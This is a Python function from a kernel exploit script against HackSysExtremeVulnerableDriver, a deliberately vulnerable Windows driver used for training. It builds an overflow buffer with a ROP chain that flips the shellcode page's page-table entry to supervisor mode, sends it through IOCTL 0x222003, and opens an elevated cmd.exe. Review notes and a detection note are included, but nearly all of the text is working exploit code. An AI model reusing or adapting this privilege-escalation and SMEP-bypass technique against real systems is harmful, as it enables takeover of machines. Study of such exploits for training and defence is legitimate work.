def trigger_stack_overflow():
    """Send the oversized IOCTL input to the HEVD device and check for elevation.

    Steps visible here: open the HEVD device, resolve two kernel module
    bases, allocate the payload page, build a buffer of 0x808 padding bytes
    followed by a chain of 8-byte little-endian addresses, hand it to the
    driver through IOCTL 0x222003, then test whether the process is now
    admin. Every helper used (kernel32, shell, debug_print, get_base_address,
    virtual_alloc_payload, get_pxe_address, c_ulong, byref, struct, sys, os)
    is defined or imported elsewhere in the file.

    NOTE(review): the ``str`` + ``struct.pack(...)`` concatenation below only
    works on Python 2 (bytes-like ``str``); on Python 3 it raises TypeError.

    Detection note: the observable user-mode signature is a handle opened on
    ``\\\\.\\HackSysExtremeVulnerableDriver`` followed by DeviceIoControl with
    code 0x222003 and an input length of roughly 0x840 bytes, then a
    ``cmd.exe`` child spawned by the same process.
    """
    dwReturn = c_ulong()
    # 0xC0000000 == GENERIC_READ | GENERIC_WRITE; 0x3 == OPEN_EXISTING.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    # CreateFileA returns INVALID_HANDLE_VALUE (-1) on failure; the default
    # ctypes restype is a C int, which is why -1 is compared directly here.
    if not driver_handle or driver_handle == -1:
        debug_print ("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        # NOTE(review): exits with status 0 even though this is an error path.
        sys.exit()
    # Module bases are looked up by name; their layout (index 0 -> hal.dll,
    # index 1 -> win32kfull.sys) is assumed from the argument order.
    base_addresses = get_base_address(["hal.dll", "win32kfull.sys"])
    hal_base_address = base_addresses[0]
    win32kfull_base_address = base_addresses[1]
    # Presumably returns the user-mode address of the allocated payload page;
    # what virtual_alloc_payload() does with protections is not visible here.
    shellcode_ptr = virtual_alloc_payload()
    debug_print ("[+] Constructing malicious buffer w/ ROP chain")
    # The hard-coded gadget offsets below are specific to one build of
    # hal.dll / win32kfull.sys and will be wrong on any other version.
    evil_input = "\x41" * 0x808 # junk
    evil_input += struct.pack("<Q", win32kfull_base_address + 0xD1122) # POP RDX; RETN
    evil_input += struct.pack("<Q", 0x63000000) # 0x63000000 -> Supervisor Mode
    evil_input += struct.pack("<Q", hal_base_address + 0xFDB2) # POP RAX; RETN
    # RAX ends up pointing 3 bytes below the page-table entry returned by
    # get_pxe_address(); the 32-bit store that follows rewrites that entry.
    evil_input += struct.pack("<Q", get_pxe_address(shellcode_ptr) - 3) # PTE(shellcode ptr) - 3
    evil_input += struct.pack("<Q", hal_base_address + 0x9943) # MOV [RAX], EDX; RETN
    evil_input += struct.pack("<Q", hal_base_address + 0x19B20) # Invalidate Cache
    evil_input += struct.pack("<Q", shellcode_ptr) # shellcode ptr
    evil_size = len(evil_input)
    # NOTE(review): this derives the raw data pointer from CPython's internal
    # string object layout (id() + a fixed header size). It is interpreter-
    # and build-specific and is not a supported way to obtain a buffer
    # address; ctypes.create_string_buffer() would be the stable equivalent.
    evil_input_ptr = id(evil_input) + 32
    debug_print ("[+] Buf size: 0x%X" % evil_size)
    debug_print ("[+] Sending malicious buffer")
    debug_print ("[+] Triggering vuln ..")
    # Input buffer and length are passed to the driver; no output buffer.
    # The return value of DeviceIoControl is not checked.
    kernel32.DeviceIoControl(driver_handle, 0x222003, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)
    # Success is inferred only from the token check, not from the IOCTL result.
    if shell.IsUserAnAdmin():
        debug_print ("[*] Enjoy Elevated Privs !\n")
        os.system('cmd.exe')
    else:
        debug_print ("[!] Exploit did not work. Re-run it!")
HEVD_stackoverflow.py 文件源码